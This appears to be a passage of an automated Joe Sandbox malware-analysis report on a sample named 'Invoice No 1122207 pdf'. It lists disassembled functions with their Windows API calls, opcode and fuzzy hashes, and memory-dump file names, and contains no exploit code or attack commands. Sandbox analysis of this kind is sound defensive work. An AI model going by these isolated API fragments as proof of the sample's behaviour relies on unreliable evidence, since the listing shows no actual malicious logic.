Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7644f6fb94bcaf4e820bbc0acd5abd0986869e14feafce7cfe9c983fb9f9b38c
Instruction ID: c9cefd1887674e26659ef604a5fb5134bf2a5a4f64c1251a1edf0bb595c37f8d
Opcode Fuzzy Hash: 7644f6fb94bcaf4e820bbc0acd5abd0986869e14feafce7cfe9c983fb9f9b38c
Instruction Fuzzy Hash: 51113C3AD01219FFEB10DBA9CD85FEDBB78EB04750F204092E604B7290D6716E50DB98

Function 0047E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0047E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0047E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0047E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0047E24D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: c104f3af63004dd52515a7bc3390fe84f3dc41de93c5742a118a384d4a9fb2ca
Instruction ID: b6a6a592197608a640e563703b85459fdc524964f18a76730567629e4bcabd6a
Opcode Fuzzy Hash: c104f3af63004dd52515a7bc3390fe84f3dc41de93c5742a118a384d4a9fb2ca
Instruction Fuzzy Hash: 9C110876A04254BBD7019BA99C45ADF7FAC9B49310F1083A6F818E7292D6748D008BA8

Function 0043D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0043CFF9,00000000,00000004,00000000), ref: 0043D218
GetLastError.KERNEL32 ref: 0043D224
__dosmaperr.LIBCMT ref: 0043D22B
ResumeThread.KERNEL32(00000000), ref: 0043D249

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 52d39bbaf73147edf9d085802b1177c033876b141600fdaad03e42d67c866e35
Instruction ID: 51834051b16dd18420ce9ff13f306668a1988137b665389d80b9f0c1e11753a7
Opcode Fuzzy Hash: 52d39bbaf73147edf9d085802b1177c033876b141600fdaad03e42d67c866e35
Instruction Fuzzy Hash: 94012632C04104BBDB105BA6EC05BAF7E68DF8A334F20126AF824921D0CF75C805C7A9

Function 0041600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0041604C
GetStockObject.GDI32(00000011), ref: 00416060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041606A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a74eaccfdf4773ea6a60f566481b17940b87a479eb4b1f57cbe54407961b4cc1
Instruction ID: ba29f56646e72325f0e0a788eb15f6c67daab6a637d514e49be6388f97691490
Opcode Fuzzy Hash: a74eaccfdf4773ea6a60f566481b17940b87a479eb4b1f57cbe54407961b4cc1
Instruction Fuzzy Hash: DE116172501549BFEF528FA49C84EEB7F69EF0D354F050116FA1456110D736DCA0DBA4

Function 00433B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00433B56

Part of subcall function 00433AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00433AD2
Part of subcall function 00433AA3: ___AdjustPointer.LIBCMT ref: 00433AED

_UnwindNestedFrames.LIBCMT ref: 00433B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00433B7C
CallCatchBlock.LIBVCRUNTIME ref: 00433BA4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 68d22ebf473e438da906f1ad14b5d256cb04ca95e965f870ed07a3eb120ae729
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 85012932100148BBDF126E96CC42EEB7B79EF9C759F04501AFE4866121C73AE961DBA4

Function 00443073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004113C6,00000000,00000000,?,0044301A,004113C6,00000000,00000000,00000000,?,0044328B,00000006,FlsSetValue), ref: 004430A5
GetLastError.KERNEL32(?,0044301A,004113C6,00000000,00000000,00000000,?,0044328B,00000006,FlsSetValue,004B2290,FlsSetValue,00000000,00000364,?,00442E46), ref: 004430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044301A,004113C6,00000000,00000000,00000000,?,0044328B,00000006,FlsSetValue,004B2290,FlsSetValue,00000000), ref: 004430BF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 85e838e7c8c9946ee77f27aec168ce9842e41902318da09ad6c22b4c183db6d9
Instruction ID: 20370f9e5c0777ce75d17edaff14bb9f75e7d6c47a18ce68a7c3708be8396776
Opcode Fuzzy Hash: 85e838e7c8c9946ee77f27aec168ce9842e41902318da09ad6c22b4c183db6d9
Instruction Fuzzy Hash: 29012B32741222ABEB314F789C84A577F98AF06F62B200731F906E7244C725D901C6E8

Function 00477464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0047747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00477497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004774AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004774CA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 82e96085e238b30f4895549be0b81f59032c72a1c61f9501471e776f2b5b00dc
Instruction ID: 5d4b0b2c14d54208af231344c9bde40a44e53b31e1d546870ab09c4f8815ee54
Opcode Fuzzy Hash: 82e96085e238b30f4895549be0b81f59032c72a1c61f9501471e776f2b5b00dc
Instruction Fuzzy Hash: 5111ADB1209310ABE7208F24DD48FE27FFCEB04B00F50C56AE61AD6191D7B4E904DBA9

Function 0047B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0047ACD3,?,00008000), ref: 0047B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0047ACD3,?,00008000), ref: 0047B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0047ACD3,?,00008000), ref: 0047B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0047ACD3,?,00008000), ref: 0047B126

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 79138d6bb3f5784e058b7eb508b89335c1e2aed42c0ca19fde1b66e9572b415d
Instruction ID: 48d7e74df17b6057cc97bd64d346efdc4ee027ff9fb537a47fbbac906ef5a239
Opcode Fuzzy Hash: 79138d6bb3f5784e058b7eb508b89335c1e2aed42c0ca19fde1b66e9572b415d
Instruction Fuzzy Hash: 86117C30E01528D7CF00AFA4EAA87EEBF78FF0A311F408096D945B2241CB3445518B99

Function 00472DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00472DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00472DD6
GetCurrentThreadId.KERNEL32 ref: 00472DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00472DE4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1961b794c472422b4c0de5b98f74789b9ee487e4c7e277c354c126e401f34e1a
Instruction ID: b87f01c5f10060a412492a9b1b870ec1c2e0f909fe0a99c32d192a9ea3c82a0e
Opcode Fuzzy Hash: 1961b794c472422b4c0de5b98f74789b9ee487e4c7e277c354c126e401f34e1a
Instruction Fuzzy Hash: 3AE092B16412247BD7705B729C4DFEB3E6CEF43BA1F004026F109D10809AE4C841C6B4

Function 004A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00429639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00429693
Part of subcall function 00429639: SelectObject.GDI32(?,00000000), ref: 004296A2
Part of subcall function 00429639: BeginPath.GDI32(?), ref: 004296B9
Part of subcall function 00429639: SelectObject.GDI32(?,00000000), ref: 004296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004A8887
LineTo.GDI32(?,?,?), ref: 004A8894
EndPath.GDI32(?), ref: 004A88A4
StrokePath.GDI32(?), ref: 004A88B2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: eea3409c18f287947b44ebd05b5ab5a1801d7610fb28201d391157bbadf28e96
Instruction ID: 9556261b7eb524f335d09c0165836ef93800bf7b0f5930650f5c2abbaad27742
Opcode Fuzzy Hash: eea3409c18f287947b44ebd05b5ab5a1801d7610fb28201d391157bbadf28e96
Instruction Fuzzy Hash: 7CF09A36045258FADB122F94AC4DFCE3F59AF16310F408015FA01650E2CB780511CFAD

Function 004298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004298CC
SetTextColor.GDI32(?,?), ref: 004298D6
SetBkMode.GDI32(?,00000001), ref: 004298E9
GetStockObject.GDI32(00000005), ref: 004298F1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: f7eb25c1e1786a791e1d19045a287f18faec2516a04ed175f5ca662420be32dc
Instruction ID: ba928036872f7c2ef7d45635bf9db5963d2cb7e7167ecdbaa58ff43519a9b47b
Opcode Fuzzy Hash: f7eb25c1e1786a791e1d19045a287f18faec2516a04ed175f5ca662420be32dc
Instruction Fuzzy Hash: 2BE06D31344280BADB615B74BC49BE93F60EB1333AF04822AF6FA581E1C77646809F15

Function 0047162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00471634
OpenThreadToken.ADVAPI32(00000000,?,?,?,004711D9), ref: 0047163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004711D9), ref: 00471648
OpenProcessToken.ADVAPI32(00000000,?,?,?,004711D9), ref: 0047164F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3455ba413995880fce21473448f674a75f37527053fdd77434d96a189192f8ac
Instruction ID: fc1552233b3613aa2d6fdab28cc4cfd17764255a119102564ca2bce572a92ddd
Opcode Fuzzy Hash: 3455ba413995880fce21473448f674a75f37527053fdd77434d96a189192f8ac
Instruction Fuzzy Hash: E9E08632601211DBD7601FE49D4DBC73F7CAF56791F148829F646D9090D6384540C798

Function 0046D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0046D858
GetDC.USER32(00000000), ref: 0046D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0046D882
ReleaseDC.USER32(?), ref: 0046D8A3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 206cc2fc030c076f2b7c3619b743b9ddd9b82a3a9a72c99e9cdd2e31203dea83
Instruction ID: 5cd352858558942da78eaa85d93ec0daa9dc37f8ad9d541f3266bd3bf05a2fe0
Opcode Fuzzy Hash: 206cc2fc030c076f2b7c3619b743b9ddd9b82a3a9a72c99e9cdd2e31203dea83
Instruction Fuzzy Hash: A9E01270D00204DFCB819FA1D84C6ADBFB1FB09310F108019E806E7350C73885429F49

Function 0046D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0046D86C
GetDC.USER32(00000000), ref: 0046D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0046D882
ReleaseDC.USER32(?), ref: 0046D8A3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c0d85b0cddf737debb096954d77e914dde948dd14f08f53024f61bdc02d8737b
Instruction ID: 825e38040d51ddbf8777e13db2eadb6bd739364f02a09a82e73b8fb59e16a5ab
Opcode Fuzzy Hash: c0d85b0cddf737debb096954d77e914dde948dd14f08f53024f61bdc02d8737b
Instruction Fuzzy Hash: 04E01A70C00204DFCB819FA0D8886ADBFB1BB08310B108019E80AE7350CB3899029F48

Function 00484D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00417620: _wcslen.LIBCMT ref: 00417625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00484ED4

Strings

LPT, xrefs: 00484DFB
*, xrefs: 00484E10

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: e25caf52f7f0e8de5eb22e55ddc85ef5245e80b209226d4d78fd73fb67584640
Instruction ID: 1d94090c200c6dc0b7fed4ee2d11222909032772910f6fb92928970a3701b455
Opcode Fuzzy Hash: e25caf52f7f0e8de5eb22e55ddc85ef5245e80b209226d4d78fd73fb67584640
Instruction Fuzzy Hash: 46916075A002059FCB14EF58C484EAEBBF1AF84308F15849EE90A9F352D739ED85CB95

Function 0043E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043E30D

Strings

pow, xrefs: 0043E2E5, 0043E302

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c541477f9eae421b223ac337b0553308c7fd5bd5869586c5af4cc5cd1a3c9164
Instruction ID: c04d28ee5ea6f7961f791f7f5e75919c2dd3efe30ca746397c05a6efdeb3ef80
Opcode Fuzzy Hash: c541477f9eae421b223ac337b0553308c7fd5bd5869586c5af4cc5cd1a3c9164
Instruction Fuzzy Hash: 0B518D61E1D10297EB117726C9413BB3B94EB14740F309AABE495423E9DB3C8C839A4E

Function 00497771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0046569E,00000000,?,004ACC08,?,00000000,00000000), ref: 004978DD

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

CharUpperBuffW.USER32(0046569E,00000000,?,004ACC08,00000000,?,00000000,00000000), ref: 0049783B

Strings

<sM, xrefs: 004977C8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sM
API String ID: 3544283678-3729773310
Opcode ID: d565e85cac2c2efbee40d5d6242868d20d8821c08f73707a0a72943b0b720337
Instruction ID: c92a08bf669e093a4a5771680f773d93d8dc16ad8186d56231a0307501107d1c
Opcode Fuzzy Hash: d565e85cac2c2efbee40d5d6242868d20d8821c08f73707a0a72943b0b720337
Instruction Fuzzy Hash: A2615D72924118AACF04FBA5CC91DFEB774FF14704B54412BE542A3191EF38AA85CBA9

Function 0042E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0042E1B1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c9618c9e19627b10224810cf6331f5e34d6c1436769dcb5c1552ba951f0a817b
Instruction ID: d1494864bbdaf89f30e31f60b50c8359592faf2ee6d2f9fca1b07af47b4668a6
Opcode Fuzzy Hash: c9618c9e19627b10224810cf6331f5e34d6c1436769dcb5c1552ba951f0a817b
Instruction Fuzzy Hash: BC511339600256DFDB14DF2AD0816FA7BA4EF15310F64405BE8929B390E6389D43CBAA

Function 0042F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0042F2A2
